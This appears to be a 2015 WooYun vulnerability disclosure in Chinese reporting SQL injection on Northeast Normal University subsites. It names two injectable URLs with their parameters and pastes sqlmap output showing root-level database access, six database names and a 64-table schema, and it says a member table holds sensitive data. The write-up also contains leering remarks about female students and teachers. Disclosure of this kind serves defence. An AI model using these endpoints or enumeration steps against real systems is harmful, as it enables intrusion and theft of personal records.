当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122819

漏洞标题:东北师范大学SQL注入漏洞

相关厂商:东北师范大学

漏洞作者: 色豹

提交时间:2015-06-26 11:20

修复时间:2015-07-01 11:22

公开时间:2015-07-01 11:22

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-26: 细节已通知厂商并且等待厂商处理中
2015-07-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

大学生毕业季,师范大学妹子多多,不看不知道,一看吓一跳。

详细说明:

漏洞地址:

http://subsite.nenu.edu.cn/qnn/questionnaire.php?cs=8295


web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user is DBA:    True
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user:    'root@localhost'


root 权限

web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [6]:
[*] gallery
[*] geyx
[*] information_schema
[*] mysql
[*] nenunew
[*] wurfl


web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: nenunew
[64 tables]
+----------------------+
| E$_nenu_urp          |
| SNP_CHECK_TAB        |
| adminuser            |
| columny              |
| daily_scorea         |
| daily_scoreb         |
| liiuy                |
| nenu_academic        |
| nenu_addon22         |
| nenu_addon23         |
| nenu_addonacademic   |
| nenu_addonbasic      |
| nenu_addonlaw        |
| nenu_addonlinks      |
| nenu_addonnews       |
| nenu_addonnotice     |
| nenu_addonxwgk       |
| nenu_admin           |
| nenu_admintype       |
| nenu_arcatt          |
| nenu_archives        |
| nenu_archives22      |
| nenu_archives23      |
| nenu_arcrank         |
| nenu_arctype         |
| nenu_basic           |
| nenu_cache_tagindex  |
| nenu_calendary       |
| nenu_channeltype     |
| nenu_full_search     |
| nenu_guest           |
| nenu_homepageset     |
| nenu_ip              |
| nenu_keywords        |
| nenu_law             |
| nenu_links           |
| nenu_log             |
| nenu_member          |
| nenu_news            |
| nenu_notice          |
| nenu_qanswer         |
| nenu_qcommit         |
| nenu_qquestion       |
| nenu_qresponese      |
| nenu_qsurvey         |
| nenu_search_cache    |
| nenu_search_keywords |
| nenu_search_rule     |
| nenu_smalltypes      |
| nenu_sysconfig       |
| nenu_syspassport     |
| nenu_tag_index       |
| nenu_tag_list        |
| nenu_uploads         |
| nenu_urp             |
| nenu_xwgk            |
| newnotice            |
| pro_score            |
| professor_en         |
| professorinfo        |
| rate                 |
| rizhi                |
| staff                |
| yut                  |
+----------------------+


nenu_member表还存在敏感信息
http://kyc.nenu.edu.cn/res_ex_s.asp?nclass=15
这个分站也存在SQL注入

漏洞证明:

漏洞地址:

http://subsite.nenu.edu.cn/qnn/questionnaire.php?cs=8295


web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user is DBA:    True
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user:    'root@localhost'


root 权限

web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [6]:
[*] gallery
[*] geyx
[*] information_schema
[*] mysql
[*] nenunew
[*] wurfl


web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: nenunew
[64 tables]
+----------------------+
| E$_nenu_urp          |
| SNP_CHECK_TAB        |
| adminuser            |
| columny              |
| daily_scorea         |
| daily_scoreb         |
| liiuy                |
| nenu_academic        |
| nenu_addon22         |
| nenu_addon23         |
| nenu_addonacademic   |
| nenu_addonbasic      |
| nenu_addonlaw        |
| nenu_addonlinks      |
| nenu_addonnews       |
| nenu_addonnotice     |
| nenu_addonxwgk       |
| nenu_admin           |
| nenu_admintype       |
| nenu_arcatt          |
| nenu_archives        |
| nenu_archives22      |
| nenu_archives23      |
| nenu_arcrank         |
| nenu_arctype         |
| nenu_basic           |
| nenu_cache_tagindex  |
| nenu_calendary       |
| nenu_channeltype     |
| nenu_full_search     |
| nenu_guest           |
| nenu_homepageset     |
| nenu_ip              |
| nenu_keywords        |
| nenu_law             |
| nenu_links           |
| nenu_log             |
| nenu_member          |
| nenu_news            |
| nenu_notice          |
| nenu_qanswer         |
| nenu_qcommit         |
| nenu_qquestion       |
| nenu_qresponese      |
| nenu_qsurvey         |
| nenu_search_cache    |
| nenu_search_keywords |
| nenu_search_rule     |
| nenu_smalltypes      |
| nenu_sysconfig       |
| nenu_syspassport     |
| nenu_tag_index       |
| nenu_tag_list        |
| nenu_uploads         |
| nenu_urp             |
| nenu_xwgk            |
| newnotice            |
| pro_score            |
| professor_en         |
| professorinfo        |
| rate                 |
| rizhi                |
| staff                |
| yut                  |
+----------------------+


nenu_member表还存在敏感信息

修复方案:

SQL 过滤
保护好未来教师们的信息哦~(特别是美女教师!!)

版权声明:转载请注明来源 色豹@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-01 11:22

厂商回复:

最新状态:

暂无